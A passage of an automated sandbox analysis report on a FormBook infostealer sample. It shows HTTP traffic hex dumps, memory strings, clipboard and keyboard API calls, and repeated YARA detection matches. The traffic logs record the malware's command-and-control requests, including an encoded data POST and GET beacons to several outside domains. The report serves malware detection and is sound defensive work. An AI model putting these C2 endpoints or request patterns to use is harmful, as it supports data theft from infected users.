22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:10:50 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:10:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:10:58 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
          Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: qHpeBvr9cR.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: qHpeBvr9cR.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.356156439.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.336262975.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: -ODfqI49.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: -ODfqI49.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: netsh.exe, 00000005.00000002.565816613.0000000003CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.lyonfinancialusa.com/henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIsz
          Source: unknownHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 45 50 64 50 77 38 64 65 49 50 47 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
          Source: unknownDNS traffic detected: queries for: www.eufidelizo.com
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1ACA0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1B830 GetKeyboardState,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: qHpeBvr9cR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
